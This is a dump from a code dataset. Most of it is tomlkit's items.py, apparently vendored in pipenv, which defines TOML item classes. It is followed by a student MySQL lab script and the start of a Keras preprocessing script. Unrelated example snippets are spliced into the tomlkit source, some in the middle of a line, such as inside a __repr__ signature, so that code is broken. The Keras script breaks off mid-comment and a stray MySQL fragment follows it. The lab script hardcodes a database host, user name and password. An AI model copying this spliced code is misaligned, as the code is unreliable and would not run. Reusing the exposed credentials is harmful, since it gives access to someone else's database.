float.__lt__\n __mod__ = wrap_method(float.__mod__)\n __mul__ = wrap_method(float.__mul__)\n __neg__ = wrap_method(float.__neg__)\n __pos__ = wrap_method(float.__pos__)\n __pow__ = wrap_method(float.__pow__)\n __radd__ = wrap_method(float.__radd__)\n __rfloordiv__ = wrap_method(float.__rfloordiv__)\n __rmod__ = wrap_method(float.__rmod__)\n __rmul__ = wrap_method(float.__rmul__)\n __round__ = wrap_method(float.__round__)\n __rpow__ = wrap_method(float.__rpow__)\n __rtruediv__ = wrap_method(float.__rtruediv__)\n __truediv__ = wrap_method(float.__truediv__)\n __trunc__ = float.__trunc__\n\n if sys.version_info >= (3, 9):\n __ceil__ = float.__ceil__\n __floor__ = float.__floor__\n else:\n __ceil__ = math.ceil\n __floor__ = math.floor\n\n\nclass Bool(Item):\n \"\"\"\n A boolean literal.\n \"\"\"\n\n def __init__(self, t: int, trivia: Trivia) -> None:\n super().__init__(trivia)\n\n self._value = bool(t)\n\n def unwrap(self) -> bool:\n return bool(self)\n\n @property\n def discriminant(self) -> int:\n return 4\n\n @property\n def value(self) -> bool:\n \"\"\"The wrapped boolean value\"\"\"\n return self._value\n\n def as_string(self) -> str:\n return str(self._value).lower()\n\n def _getstate(self, protocol=3):\n return self._value, self._trivia\n\n def __bool__(self):\n return self._value\n\n __nonzero__ = __bool__\n\n def __eq__(self, other):\n if not isinstance(other, bool):\n return NotImplemented\n\n return other == self._value\n\n def __hash__(self):\n return hash(self._value)\n\n def __repr__(self):\n return repr(self._value)\n\n\nclass DateTime(Item, datetime):\n \"\"\"\n A datetime literal.\n \"\"\"\n\n def __new__(\n cls,\n year: int,\n month: int,\n day: int,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n *_: Any,\n **kwargs: Any,\n ) -> datetime:\n return datetime.__new__(\n cls,\n year,\n month,\n day,\n hour,\n minute,\n second,\n microsecond,\n tzinfo=tzinfo,\n **kwargs,\n )\n\n def __init__(\n self,\n year: int,\n month: int,\n day: int,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n trivia: Trivia | None = None,\n raw: str | None = None,\n **kwargs: Any,\n ) -> None:\n super().__init__(trivia or Trivia())\n\n self._raw = raw or self.isoformat()\n\n def unwrap(self) -> datetime:\n (\n year,\n month,\n day,\n hour,\n minute,\n second,\n microsecond,\n tzinfo,\n _,\n _,\n ) = self._getstate()\n return datetime(year, month, day, hour, minute, second, microsecond, tzinfo)\n\n @property\n def discriminant(self) -> int:\n return 5\n\n @property\n def value(self) -> datetime:\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def __add__(self, other):\n if PY38:\n result = datetime(\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n ).__add__(other)\n else:\n result = super().__add__(other)\n\n return self._new(result)\n\n def __sub__(self, other):\n if PY38:\n result = datetime(\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n ).__sub__(other)\n else:\n result = super().__sub__(other)\n\n if isinstance(result, datetime):\n result = self._new(result)\n\n return result\n\n def replace(self, *args: Any, **kwargs: Any) -> datetime:\n return self._new(super().replace(*args, **kwargs))\n\n def astimezone(self, tz: tzinfo) -> datetime:\n result = super().astimezone(tz)\n if PY38:\n return result\n return self._new(result)\n\n def _new(self, result) -> 
DateTime:\n raw = result.isoformat()\n\n return DateTime(\n result.year,\n result.month,\n result.day,\n result.hour,\n result.minute,\n result.second,\n result.microsecond,\n result.tzinfo,\n self._trivia,\n raw,\n )\n\n def _getstate(self, protocol=3):\n return (\n self.year,\n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n self._trivia,\n self._raw,\n )\n\n\nclass Date(Item, date):\n \"\"\"\n A date literal.\n \"\"\"\n\n def __new__(cls, year: int, month: int, day: int, *_: Any) -> date:\n return date.__new__(cls, year, month, day)\n\n def __init__(\n self, year: int, month: int, day: int, trivia: Trivia, raw: str\n ) -> None:\n super().__init__(trivia)\n\n self._raw = raw\n\n def unwrap(self) -> date:\n (year, month, day, _, _) = self._getstate()\n return date(year, month, day)\n\n @property\n def discriminant(self) -> int:\n return 6\n\n @property\n def value(self) -> date:\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def __add__(self, other):\n if PY38:\n result = date(self.year, self.month, self.day).__add__(other)\n else:\n result = super().__add__(other)\n\n return self._new(result)\n\n def __sub__(self, other):\n if PY38:\n result = date(self.year, self.month, self.day).__sub__(other)\n else:\n result = super().__sub__(other)\n\n if isinstance(result, date):\n result = self._new(result)\n\n return result\n\n def replace(self, *args: Any, **kwargs: Any) -> date:\n return self._new(super().replace(*args, **kwargs))\n\n def _new(self, result):\n raw = result.isoformat()\n\n return Date(result.year, result.month, result.day, self._trivia, raw)\n\n def _getstate(self, protocol=3):\n return (self.year, self.month, self.day, self._trivia, self._raw)\n\n\nclass Time(Item, time):\n \"\"\"\n A time literal.\n \"\"\"\n\n def __new__(\n cls,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n *_: Any,\n ) -> time:\n return time.__new__(cls, hour, minute, second, microsecond, tzinfo)\n\n def __init__(\n self,\n hour: int,\n minute: int,\n second: int,\n microsecond: int,\n tzinfo: tzinfo | None,\n trivia: Trivia,\n raw: str,\n ) -> None:\n super().__init__(trivia)\n\n self._raw = raw\n\n def unwrap(self) -> time:\n (hour, minute, second, microsecond, tzinfo, _, _) = self._getstate()\n return time(hour, minute, second, microsecond, tzinfo)\n\n @property\n def discriminant(self) -> int:\n return 7\n\n @property\n def value(self) -> time:\n return self\n\n def as_string(self) -> str:\n return self._raw\n\n def replace(self, *args: Any, **kwargs: Any) -> time:\n return self._new(super().replace(*args, **kwargs))\n\n def _new(self, result):\n raw = result.isoformat()\n\n return Time(\n result.hour,\n result.minute,\n result.second,\n result.microsecond,\n result.tzinfo,\n self._trivia,\n raw,\n )\n\n def _getstate(self, protocol: int = 3) -> tuple:\n return (\n self.hour,\n self.minute,\n self.second,\n self.microsecond,\n self.tzinfo,\n self._trivia,\n self._raw,\n )\n\n\nclass _ArrayItemGroup:\n __slots__ = (\"value\", \"indent\", \"comma\", \"comment\")\n\n def __init__(\n self,\n value: Item | None = None,\n indent: Whitespace | None = None,\n comma: Whitespace | None = None,\n comment: Comment | None = None,\n ) -> None:\n self.value = value\n self.indent = indent\n self.comma = comma\n self.comment = comment\n\n def __iter__(self) -> Iterator[Item]:\n return filter(\n lambda x: x is not None, (self.indent, self.value, self.comma, self.comment)\n )\n\n def __repr__(self) -> 
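# Date arithmetic also round-trips through _new, so the raw TOML string
# tracks the new value:
import datetime
from tomlkit.items import item

d = item(datetime.date(2024, 1, 31)) + datetime.timedelta(days=1)
assert d.as_string() == "2024-02-01"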
str:\n return repr(tuple(self))\n\n def is_whitespace(self) -> bool:\n return self.value is None and self.comment is None\n\n def __bool__(self) -> bool:\n try:\n next(iter(self))\n except StopIteration:\n return False\n return True\n\n\nclass Array(Item, _CustomList):\n \"\"\"\n An array literal\n \"\"\"\n\n def __init__(\n self, value: list[Item], trivia: Trivia, multiline: bool = False\n ) -> None:\n super().__init__(trivia)\n list.__init__(\n self,\n [v for v in value if not isinstance(v, (Whitespace, Comment, Null))],\n )\n self._index_map: dict[int, int] = {}\n self._value = self._group_values(value)\n self._multiline = multiline\n self._reindex()\n\n def _group_values(self, value: list[Item]) -> list[_ArrayItemGroup]:\n \"\"\"Group the values into (indent, value, comma, comment) tuples\"\"\"\n groups = []\n this_group = _ArrayItemGroup()\n for item in value:\n if isinstance(item, Whitespace):\n if \",\" not in item.s:\n groups.append(this_group)\n this_group = _ArrayItemGroup(indent=item)\n else:\n if this_group.value is None:\n # when comma is met and no value is provided, add a dummy Null\n this_group.value = Null()\n this_group.comma = item\n elif isinstance(item, Comment):\n if this_group.value is None:\n this_group.value = Null()\n this_group.comment = item\n elif this_group.value is None:\n this_group.value = item\n else:\n groups.append(this_group)\n this_group = _ArrayItemGroup(value=item)\n groups.append(this_group)\n return [group for group in groups if group]\n\n def unwrap(self) -> list[Any]:\n unwrapped = []\n for v in self:\n if hasattr(v, \"unwrap\"):\n unwrapped.append(v.unwrap())\n else:\n unwrapped.append(v)\n return unwrapped\n\n @property\n def discriminant(self) -> int:\n return 8\n\n @property\n def value(self) -> list:\n return self\n\n def _iter_items(self) -> Iterator[Item]:\n for v in self._value:\n yield from v\n\n def multiline(self, multiline: bool) -> Array:\n \"\"\"Change the array to display in multiline or not.\n\n :Example:\n\n >>> a = item([1, 2, 3])\n >>> print(a.as_string())\n [1, 2, 3]\n >>> print(a.multiline(True).as_string())\n [\n 1,\n 2,\n 3,\n ]\n \"\"\"\n self._multiline = multiline\n\n return self\n\n def as_string(self) -> str:\n if not self._multiline or not self._value:\n return f'[{\"\".join(v.as_string() for v in self._iter_items())}]'\n\n s = \"[\\n\"\n s += \"\".join(\n self.trivia.indent\n + \" \" * 4\n + v.value.as_string()\n + (\",\" if not isinstance(v.value, Null) else \"\")\n + (v.comment.as_string() if v.comment is not None else \"\")\n + \"\\n\"\n for v in self._value\n if v.value is not None\n )\n s += self.trivia.indent + \"]\"\n\n return s\n\n def _reindex(self) -> None:\n self._index_map.clear()\n index = 0\n for i, v in enumerate(self._value):\n if v.value is None or isinstance(v.value, Null):\n continue\n self._index_map[index] = i\n index += 1\n\n def add_line(\n self,\n *items: Any,\n indent: str = \" \",\n comment: str | None = None,\n add_comma: bool = True,\n newline: bool = True,\n ) -> None:\n \"\"\"Add multiple items in a line to control the format precisely.\n When add_comma is True, only accept actual values and\n \", \" will be added between values automatically.\n\n :Example:\n\n >>> a = array()\n >>> a.add_line(1, 2, 3)\n >>> a.add_line(4, 5, 6)\n >>> a.add_line(indent=\"\")\n >>> print(a.as_string())\n [\n 1, 2, 3,\n 4, 5, 6,\n ]\n \"\"\"\n new_values: list[Item] = []\n first_indent = f\"\\n{indent}\" if newline else indent\n if first_indent:\n new_values.append(Whitespace(first_indent))\n whitespace = 
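# The multiline() doctest above, exercised directly:
from tomlkit.items import item

a = item([1, 2, 3])
assert a.as_string() == "[1, 2, 3]"
print(a.multiline(True).as_string())
# [
#     1,
#     2,
#     3,
# ]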
\"\"\n data_values = []\n for i, el in enumerate(items):\n it = item(el, _parent=self)\n if isinstance(it, Comment) or add_comma and isinstance(el, Whitespace):\n raise ValueError(f\"item type {type(it)} is not allowed in add_line\")\n if not isinstance(it, Whitespace):\n if whitespace:\n new_values.append(Whitespace(whitespace))\n whitespace = \"\"\n new_values.append(it)\n data_values.append(it.value)\n if add_comma:\n new_values.append(Whitespace(\",\"))\n if i != len(items) - 1:\n new_values.append(Whitespace(\" \"))\n elif \",\" not in it.s:\n whitespace += it.s\n else:\n new_values.append(it)\n if whitespace:\n new_values.append(Whitespace(whitespace))\n if comment:\n indent = \" \" if items else \"\"\n new_values.append(\n Comment(Trivia(indent=indent, comment=f\"# {comment}\", trail=\"\"))\n )\n list.extend(self, data_values)\n if len(self._value) > 0:\n last_item = self._value[-1]\n last_value_item = next(\n (\n v\n for v in self._value[::-1]\n if v.value is not None and not isinstance(v.value, Null)\n ),\n None,\n )\n if last_value_item is not None:\n last_value_item.comma = Whitespace(\",\")\n if last_item.is_whitespace():\n self._value[-1:-1] = self._group_values(new_values)\n else:\n self._value.extend(self._group_values(new_values))\n else:\n self._value.extend(self._group_values(new_values))\n self._reindex()\n\n def clear(self) -> None:\n \"\"\"Clear the array.\"\"\"\n list.clear(self)\n self._index_map.clear()\n self._value.clear()\n\n def __len__(self) -> int:\n return list.__len__(self)\n\n def __getitem__(self, key: int | slice) -> Any:\n rv = cast(Item, list.__getitem__(self, key))\n if rv.is_boolean():\n return bool(rv)\n return rv\n\n def __setitem__(self, key: int | slice, value: Any) -> Any:\n it = item(value, _parent=self)\n list.__setitem__(self, key, it)\n if isinstance(key, slice):\n raise ValueError(\"slice assignment is not supported\")\n if key < 0:\n key += len(self)\n self._value[self._index_map[key]].value = it\n\n def insert(self, pos: int, value: Any) -> None:\n it = item(value, _parent=self)\n length = len(self)\n if not isinstance(it, (Comment, Whitespace)):\n list.insert(self, pos, it)\n if pos < 0:\n pos += length\n if pos < 0:\n pos = 0\n\n idx = 0 # insert position of the self._value list\n default_indent = \" \"\n if pos < length:\n try:\n idx = self._index_map[pos]\n except KeyError as e:\n raise IndexError(\"list index out of range\") from e\n else:\n idx = len(self._value)\n if idx >= 1 and self._value[idx - 1].is_whitespace():\n # The last item is a pure whitespace(\\n ), insert before it\n idx -= 1\n if (\n self._value[idx].indent is not None\n and \"\\n\" in self._value[idx].indent.s\n ):\n default_indent = \"\\n \"\n indent: Item | None = None\n comma: Item | None = Whitespace(\",\") if pos < length else None\n if idx < len(self._value) and not self._value[idx].is_whitespace():\n # Prefer to copy the indentation from the item after\n indent = self._value[idx].indent\n if idx > 0:\n last_item = self._value[idx - 1]\n if indent is None:\n indent = last_item.indent\n if not isinstance(last_item.value, Null) and \"\\n\" in default_indent:\n # Copy the comma from the last item if 1) it contains a value and\n # 2) the array is multiline\n comma = last_item.comma\n if last_item.comma is None and not isinstance(last_item.value, Null):\n # Add comma to the last item to separate it from the following items.\n last_item.comma = Whitespace(\",\")\n if indent is None and (idx > 0 or \"\\n\" in default_indent):\n # apply default indent if it isn't the 
first item or the array is multiline.\n indent = Whitespace(default_indent)\n new_item = _ArrayItemGroup(value=it, indent=indent, comma=comma)\n self._value.insert(idx, new_item)\n self._reindex()\n\n def __delitem__(self, key: int | slice):\n length = len(self)\n list.__delitem__(self, key)\n\n if isinstance(key, slice):\n indices_to_remove = list(\n range(key.start or 0, key.stop or length, key.step or 1)\n )\n else:\n indices_to_remove = [length + key if key < 0 else key]\n for i in sorted(indices_to_remove, reverse=True):\n try:\n idx = self._index_map[i]\n except KeyError as e:\n if not isinstance(key, slice):\n raise IndexError(\"list index out of range\") from e\n else:\n del self._value[idx]\n if (\n idx == 0\n and len(self._value) > 0\n and \"\\n\" not in self._value[idx].indent.s\n ):\n # Remove the indentation of the first item if not newline\n self._value[idx].indent = None\n if len(self._value) > 0:\n v = self._value[-1]\n if not v.is_whitespace():\n # remove the comma of the last item\n v.comma = None\n\n self._reindex()\n\n def _getstate(self, protocol=3):\n return list(self._iter_items()), self._trivia, self._multiline\n\n\nclass AbstractTable(Item, _CustomDict):\n \"\"\"Common behaviour of both :class:`Table` and :class:`InlineTable`\"\"\"\n\n def __init__(self, value: container.Container, trivia: Trivia):\n Item.__init__(self, trivia)\n\n self._value = value\n\n for k, v in self._value.body:\n if k is not None:\n dict.__setitem__(self, k.key, v)\n\n def unwrap(self) -> dict[str, Any]:\n unwrapped = {}\n for k, v in self.items():\n if isinstance(k, Key):\n k = k.key\n if hasattr(v, \"unwrap\"):\n v = v.unwrap()\n unwrapped[k] = v\n\n return unwrapped\n\n @property\n def value(self) -> container.Container:\n return self._value\n\n @overload\n def append(self: AT, key: None, value: Comment | Whitespace) -> AT:\n ...\n\n @overload\n def append(self: AT, key: Key | str, value: Any) -> AT:\n ...\n\n def append(self, key, value):\n raise NotImplementedError\n\n @overload\n def add(self: AT, key: Comment | Whitespace) -> AT:\n ...\n\n @overload\n def add(self: AT, key: Key | str, value: Any = ...) 
-> AT:\n ...\n\n def add(self, key, value=None):\n if value is None:\n if not isinstance(key, (Comment, Whitespace)):\n msg = \"Non comment/whitespace items must have an associated key\"\n raise ValueError(msg)\n\n key, value = None, key\n\n return self.append(key, value)\n\n def remove(self: AT, key: Key | str) -> AT:\n self._value.remove(key)\n\n if isinstance(key, Key):\n key = key.key\n\n if key is not None:\n dict.__delitem__(self, key)\n\n return self\n\n def setdefault(self, key: Key | str, default: Any) -> Any:\n super().setdefault(key, default)\n return self[key]\n\n def __str__(self):\n return str(self.value)\n\n def copy(self: AT) -> AT:\n return copy.copy(self)\n\n def __repr__(self) -> str:\n return repr(self.value)\n\n def __iter__(self) -> Iterator[str]:\n return iter(self._value)\n\n def __len__(self) -> int:\n return len(self._value)\n\n def __delitem__(self, key: Key | str) -> None:\n self.remove(key)\n\n def __getitem__(self, key: Key | str) -> Item:\n return cast(Item, self._value[key])\n\n def __setitem__(self, key: Key | str, value: Any) -> None:\n if not isinstance(value, Item):\n value = item(value, _parent=self)\n\n is_replace = key in self\n self._value[key] = value\n\n if key is not None:\n dict.__setitem__(self, key, value)\n\n if is_replace:\n return\n m = re.match(\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if not m:\n return\n\n indent = m.group(1)\n\n if not isinstance(value, Whitespace):\n m = re.match(\"(?s)^([^ ]*)(.*)$\", value.trivia.indent)\n if not m:\n value.trivia.indent = indent\n else:\n value.trivia.indent = m.group(1) + indent + m.group(2)\n\n\nclass Table(AbstractTable):\n \"\"\"\n A table literal.\n \"\"\"\n\n def __init__(\n self,\n value: container.Container,\n trivia: Trivia,\n is_aot_element: bool,\n is_super_table: bool | None = None,\n name: str | None = None,\n display_name: str | None = None,\n ) -> None:\n super().__init__(value, trivia)\n\n self.name = name\n self.display_name = display_name\n self._is_aot_element = is_aot_element\n self._is_super_table = is_super_table\n\n @property\n def discriminant(self) -> int:\n return 9\n\n def __copy__(self) -> Table:\n return type(self)(\n self._value.copy(),\n self._trivia.copy(),\n self._is_aot_element,\n self._is_super_table,\n self.name,\n self.display_name,\n )\n\n def append(self, key: Key | str | None, _item: Any) -> Table:\n \"\"\"\n Appends a (key, item) to the table.\n \"\"\"\n if not isinstance(_item, Item):\n _item = item(_item, _parent=self)\n\n self._value.append(key, _item)\n\n if isinstance(key, Key):\n key = next(iter(key)).key\n _item = self._value[key]\n\n if key is not None:\n dict.__setitem__(self, key, _item)\n\n m = re.match(r\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if not m:\n return self\n\n indent = m.group(1)\n\n if not isinstance(_item, Whitespace):\n m = re.match(\"(?s)^([^ ]*)(.*)$\", _item.trivia.indent)\n if not m:\n _item.trivia.indent = indent\n else:\n _item.trivia.indent = m.group(1) + indent + m.group(2)\n\n return self\n\n def raw_append(self, key: Key | str | None, _item: Any) -> Table:\n \"\"\"Similar to :meth:`append` but does not copy indentation.\"\"\"\n if not isinstance(_item, Item):\n _item = item(_item)\n\n self._value.append(key, _item)\n\n if isinstance(key, Key):\n key = next(iter(key)).key\n _item = self._value[key]\n\n if key is not None:\n dict.__setitem__(self, key, _item)\n\n return self\n\n def is_aot_element(self) -> bool:\n \"\"\"True if the table is the direct child of an AOT element.\"\"\"\n return 
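# Building the Table above through tomlkit's public helpers
# (tomlkit.table() returns an instance of this class):
import tomlkit

t = tomlkit.table()
t.add("name", "demo")   # goes through Table.append
t["count"] = 3          # __setitem__ wraps the int via item()
print(t.as_string())
# name = "demo"
# count = 3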
self._is_aot_element\n\n def is_super_table(self) -> bool:\n \"\"\"A super table is the intermediate parent of a nested table as in [a.b.c].\n If true, it won't appear in the TOML representation.\"\"\"\n if self._is_super_table is not None:\n return self._is_super_table\n # If the table has only one child and that child is a table, then it is a super table.\n if len(self) != 1:\n return False\n only_child = next(iter(self.values()))\n return isinstance(only_child, (Table, AoT))\n\n def as_string(self) -> str:\n return self._value.as_string()\n\n # Helpers\n\n def indent(self, indent: int) -> Table:\n \"\"\"Indent the table with given number of spaces.\"\"\"\n super().indent(indent)\n\n m = re.match(\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if not m:\n indent_str = \"\"\n else:\n indent_str = m.group(1)\n\n for _, item in self._value.body:\n if not isinstance(item, Whitespace):\n item.trivia.indent = indent_str + item.trivia.indent\n\n return self\n\n def invalidate_display_name(self):\n self.display_name = None\n\n for child in self.values():\n if hasattr(child, \"invalidate_display_name\"):\n child.invalidate_display_name()\n\n def _getstate(self, protocol: int = 3) -> tuple:\n return (\n self._value,\n self._trivia,\n self._is_aot_element,\n self._is_super_table,\n self.name,\n self.display_name,\n )\n\n\nclass InlineTable(AbstractTable):\n \"\"\"\n An inline table literal.\n \"\"\"\n\n def __init__(\n self, value: container.Container, trivia: Trivia, new: bool = False\n ) -> None:\n super().__init__(value, trivia)\n\n self._new = new\n\n @property\n def discriminant(self) -> int:\n return 10\n\n def append(self, key: Key | str | None, _item: Any) -> InlineTable:\n \"\"\"\n Appends a (key, item) to the table.\n \"\"\"\n if not isinstance(_item, Item):\n _item = item(_item, _parent=self)\n\n if not isinstance(_item, (Whitespace, Comment)):\n if not _item.trivia.indent and len(self._value) > 0 and not self._new:\n _item.trivia.indent = \" \"\n if _item.trivia.comment:\n _item.trivia.comment = \"\"\n\n self._value.append(key, _item)\n\n if isinstance(key, Key):\n key = key.key\n\n if key is not None:\n dict.__setitem__(self, key, _item)\n\n return self\n\n def as_string(self) -> str:\n buf = \"{\"\n last_item_idx = next(\n (\n i\n for i in range(len(self._value.body) - 1, -1, -1)\n if self._value.body[i][0] is not None\n ),\n None,\n )\n for i, (k, v) in enumerate(self._value.body):\n if k is None:\n if i == len(self._value.body) - 1:\n if self._new:\n buf = buf.rstrip(\", \")\n else:\n buf = buf.rstrip(\",\")\n\n buf += v.as_string()\n\n continue\n\n v_trivia_trail = v.trivia.trail.replace(\"\\n\", \"\")\n buf += (\n f\"{v.trivia.indent}\"\n f'{k.as_string() + (\".\" if k.is_dotted() else \"\")}'\n f\"{k.sep}\"\n f\"{v.as_string()}\"\n f\"{v.trivia.comment}\"\n f\"{v_trivia_trail}\"\n )\n\n if last_item_idx is not None and i < last_item_idx:\n buf += \",\"\n if self._new:\n buf += \" \"\n\n buf += \"}\"\n\n return buf\n\n def __setitem__(self, key: Key | str, value: Any) -> None:\n if hasattr(value, \"trivia\") and value.trivia.comment:\n value.trivia.comment = \"\"\n super().__setitem__(key, value)\n\n def __copy__(self) -> InlineTable:\n return type(self)(self._value.copy(), self._trivia.copy(), self._new)\n\n def _getstate(self, protocol: int = 3) -> tuple:\n return (self._value, self._trivia)\n\n\nclass String(str, Item):\n \"\"\"\n A string literal.\n \"\"\"\n\n def __new__(cls, t, value, original, trivia):\n return super().__new__(cls, value)\n\n def __init__(self, t: 
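# The InlineTable renderer above in action:
import tomlkit

it = tomlkit.inline_table()
it["a"] = 1
it["b"] = 2
assert it.as_string() == "{a = 1, b = 2}"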
StringType, _: str, original: str, trivia: Trivia) -> None:\n super().__init__(trivia)\n\n self._t = t\n self._original = original\n\n def unwrap(self) -> str:\n return str(self)\n\n @property\n def discriminant(self) -> int:\n return 11\n\n @property\n def value(self) -> str:\n return self\n\n def as_string(self) -> str:\n return f\"{self._t.value}{decode(self._original)}{self._t.value}\"\n\n def __add__(self: ItemT, other: str) -> ItemT:\n if not isinstance(other, str):\n return NotImplemented\n result = super().__add__(other)\n original = self._original + getattr(other, \"_original\", other)\n\n return self._new(result, original)\n\n def _new(self, result: str, original: str) -> String:\n return String(self._t, result, original, self._trivia)\n\n def _getstate(self, protocol=3):\n return self._t, str(self), self._original, self._trivia\n\n @classmethod\n def from_raw(cls, value: str, type_=StringType.SLB, escape=True) -> String:\n value = decode(value)\n\n invalid = type_.invalid_sequences\n if any(c in value for c in invalid):\n raise InvalidStringError(value, invalid, type_.value)\n\n escaped = type_.escaped_sequences\n string_value = escape_string(value, escaped) if escape and escaped else value\n\n return cls(type_, decode(value), string_value, Trivia())\n\n\nclass AoT(Item, _CustomList):\n \"\"\"\n An array of table literal\n \"\"\"\n\n def __init__(\n self, body: list[Table], name: str | None = None, parsed: bool = False\n ) -> None:\n self.name = name\n self._body: list[Table] = []\n self._parsed = parsed\n\n super().__init__(Trivia(trail=\"\"))\n\n for table in body:\n self.append(table)\n\n def unwrap(self) -> list[dict[str, Any]]:\n unwrapped = []\n for t in self._body:\n if hasattr(t, \"unwrap\"):\n unwrapped.append(t.unwrap())\n else:\n unwrapped.append(t)\n return unwrapped\n\n @property\n def body(self) -> list[Table]:\n return self._body\n\n @property\n def discriminant(self) -> int:\n return 12\n\n @property\n def value(self) -> list[dict[Any, Any]]:\n return [v.value for v in self._body]\n\n def __len__(self) -> int:\n return len(self._body)\n\n @overload\n def __getitem__(self, key: slice) -> list[Table]:\n ...\n\n @overload\n def __getitem__(self, key: int) -> Table:\n ...\n\n def __getitem__(self, key):\n return self._body[key]\n\n def __setitem__(self, key: slice | int, value: Any) -> None:\n raise NotImplementedError\n\n def __delitem__(self, key: slice | int) -> None:\n del self._body[key]\n list.__delitem__(self, key)\n\n def insert(self, index: int, value: dict) -> None:\n value = item(value, _parent=self)\n if not isinstance(value, Table):\n raise ValueError(f\"Unsupported insert value type: {type(value)}\")\n length = len(self)\n if index < 0:\n index += length\n if index < 0:\n index = 0\n elif index >= length:\n index = length\n m = re.match(\"(?s)^[^ ]*([ ]+).*$\", self._trivia.indent)\n if m:\n indent = m.group(1)\n\n m = re.match(\"(?s)^([^ ]*)(.*)$\", value.trivia.indent)\n if not m:\n value.trivia.indent = indent\n else:\n value.trivia.indent = m.group(1) + indent + m.group(2)\n prev_table = self._body[index - 1] if 0 < index and length else None\n next_table = self._body[index + 1] if index < length - 1 else None\n if not self._parsed:\n if prev_table and \"\\n\" not in value.trivia.indent:\n value.trivia.indent = \"\\n\" + value.trivia.indent\n if next_table and \"\\n\" not in next_table.trivia.indent:\n next_table.trivia.indent = \"\\n\" + next_table.trivia.indent\n self._body.insert(index, value)\n list.insert(self, index, value)\n\n def 
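# from_raw escapes according to the StringType tables defined earlier:
from tomlkit.items import String, StringType

s = String.from_raw('he said "hi"')                 # default: single-line basic
assert s.as_string() == '"he said \\"hi\\""'
assert String.from_raw("c:\\temp", StringType.SLL).as_string() == "'c:\\temp'"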
invalidate_display_name(self):\n        \"\"\"Call ``invalidate_display_name`` on the contained tables\"\"\"\n        for child in self:\n            if hasattr(child, \"invalidate_display_name\"):\n                child.invalidate_display_name()\n\n    def as_string(self) -> str:\n        b = \"\"\n        for table in self._body:\n            b += table.as_string()\n\n        return b\n\n    def __repr__(self) -> str:\n        return f\"<AoT {self.value}>\"\n\n    def _getstate(self, protocol=3):\n        return self._body, self.name, self._parsed\n\n\nclass Null(Item):\n    \"\"\"\n    A null item.\n    \"\"\"\n\n    def __init__(self) -> None:\n        pass\n\n    def unwrap(self) -> None:\n        return None\n\n    @property\n    def discriminant(self) -> int:\n        return -1\n\n    @property\n    def value(self) -> None:\n        return None\n\n    def as_string(self) -> str:\n        return \"\"\n\n    def _getstate(self, protocol=3) -> tuple:\n        return ()\n","repo_name":"pypa/pipenv","sub_path":"pipenv/vendor/tomlkit/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":53096,"program_lang":"python","lang":"en","doc_type":"code","stars":24273,"dataset":"github-code","pt":"34"}
{"seq_id":"37986800822","text":"import mysql.connector\n\nmy_con = mysql.connector.connect(\n    host=\"remotemysql.com\",\n    user=\"bPHiiRCWTe\",\n    passwd=\"Ftl2nnrmAp\",\n    database=\"bPHiiRCWTe\"\n)\nprint('connected!')\ncursor = my_con.cursor()\n\n# 1.3\nprint('\\nprinting character names showing only lastname')\ncursor.execute(\"SELECT * FROM characters RIGHT JOIN anime ON characters.animeFK = anime.id\")\nfor x in cursor:\n    if x[0] == 3 or x[0] == 4:\n        print(x, sep=\" \")\n\n# 1.4\n# characters = \"INSERT INTO characters (id, fName, lName, popularity, animeFK) VALUES(%s , %s, %s, %s, %s)\"\n# abcde = (501470, 'Nobita', 'Nobisuge', 42, 24)\n# cursor.execute(characters, abcde)\n# cursor.execute(\"SELECT * FROM characters\")\n# for x in cursor:\n#     if x[0] == 501470 :\n#         print(x, sep=\" \")\n\n# 1.5\ncursor.execute(\"SELECT * FROM characters RIGHT JOIN anime ON characters.animeFK = anime.id\")\nfor x in cursor:\n    if x[0] == 501470:\n        print(x[0], x[1], x[2], x[3], x[4], x[6], x[7], sep=\" \")\n\n# print('\\nprinting anime names')\n# cursor.execute(\"SELECT * FROM anime\")\n# for y in cursor:\n#     id = y[0]\n#     print(id, y[1], sep=\" \")\n\ncursor.close()\n# my_con.commit()\nmy_con.close()\n","repo_name":"tamatee/KMITL","sub_path":"Year1/firstSemester/comSci/Lab5/Lab5_pechon.py","file_name":"Lab5_pechon.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"}
{"seq_id":"7837921005","text":"import csv\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.callbacks import ModelCheckpoint\n\nMODEL_FILE = 'nn_model.hd5'\nDATA_FILE = 'data.csv'\n\ndef process_data(data_name):\n    #open csv file\n    with open(data_name, 'r') as csvfile:\n        data = list(csv.reader(csvfile, delimiter=\",\"))\n    #convert columns into floats (bools for results column)\n    for i in range(1,len(data)):\n        for j in range(len(data[i])-1):\n            data[i][j] = float(data[i][j])\n        data[i][-1] = bool(int(data[i][-1]))\n\n    #organising in dataframes\n    pre_data = pd.DataFrame(data)\n    x_data = pre_data.iloc[1:,:-1].dropna()\n    y_data = pre_data.iloc[1:,-1].dropna()\n\n    #scaling data to [0,1]\n    scaler = MinMaxScaler()\n    scaler.fit(x_data)\n    X = pd.DataFrame(scaler.transform(x_data))\n\n    #adding noise to 
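The `1.3`/`1.5` blocks of the MySQL lab record above fetch every joined row and filter by id in Python. A hedged alternative that pushes the filter into a parameterized `WHERE` clause (same throwaway credentials as the snippet; treat them as placeholders):

```python
import mysql.connector

con = mysql.connector.connect(host="remotemysql.com", user="bPHiiRCWTe",
                              passwd="Ftl2nnrmAp", database="bPHiiRCWTe")
cur = con.cursor()
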